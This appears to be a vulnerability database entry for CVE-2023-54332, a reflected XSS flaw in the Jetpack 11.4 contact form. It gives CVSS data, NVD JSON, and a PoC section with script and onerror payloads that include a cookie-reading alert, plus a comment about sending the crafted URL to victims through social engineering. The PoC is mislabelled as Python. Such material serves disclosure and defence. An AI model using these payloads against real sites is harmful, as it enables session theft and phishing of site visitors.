CVE-2023-54332

Description

Jetpack 11.4 contains a cross-site scripting vulnerability in the contact form module that allows attackers to inject malicious scripts through the post_id parameter. Attackers can craft malicious URLs with script payloads to execute arbitrary JavaScript in victims' browsers when they interact with the contact form page.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:automattic:jetpack:11.4:*:*:*:*:wordpress:*:* - VULNERABLE

Jetpack < 11.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2023-54332 XSS PoC -->
<!-- Malicious URL to trigger XSS via post_id parameter -->
<a href='http://target-site.com/?p=1&post_id="><script>alert(document.cookie)</script>'>Click Here</a>

<!-- Alternative PoC with event handler -->
<a href='http://target-site.com/?p=1&post_id="><img src=x onerror=alert(String.fromCharCode(88,83,83))>>'>Click Here</a>

<!-- Automated PoC testing script -->
<script>
const targetUrl = 'http://target-site.com';
const xssPayload = '<script>alert(document.domain)</script>';
const maliciousUrl = `${targetUrl}/?post_id=${encodeURIComponent(xssPayload)}`;
console.log('Malicious URL:', maliciousUrl);
// Send this URL to victim via social engineering
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-54332
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-54332
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-54332/
[4] VulDB https://vuldb.com/cve/CVE-2023-54332
[5] https://wordpress.org/plugins/jetpack
[6] https://www.exploit-db.com/exploits/51104
[7] https://www.vulncheck.com/advisories/jetpack-cross-site-scripting-xss

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-54332", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:16:00.513", "lastModified": "2026-01-29T18:54:34.747", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jetpack 11.4 contains a cross-site scripting vulnerability in the contact form module that allows attackers to inject malicious scripts through the post_id parameter. Attackers can craft malicious URLs with script payloads to execute arbitrary JavaScript in victims' browsers when they interact with the contact form page."}, {"lang": "es", "value": "Jetpack 11.4 contiene una cross-site scripting vulnerabilidad en el módulo de formulario de contacto que permite a los atacantes inyectar scripts maliciosos a través del parámetro post_id. Los atacantes pueden crear URLs maliciosas con cargas útiles de script para ejecutar JavaScript arbitrario en los navegadores de las víctimas cuando interactúan con la página del formulario de contacto."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:automattic:jetpack:11.4:*:*:*:*:wordpress:*:*", "matchCriteriaId": "C914D82F-80BB-42BF-91AD-A56C0A2F9B43"}]}]}], "references": [{"url": "https://wordpress.org/plugins/jetpack", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51104", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/jetpack-cross-site-scripting-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}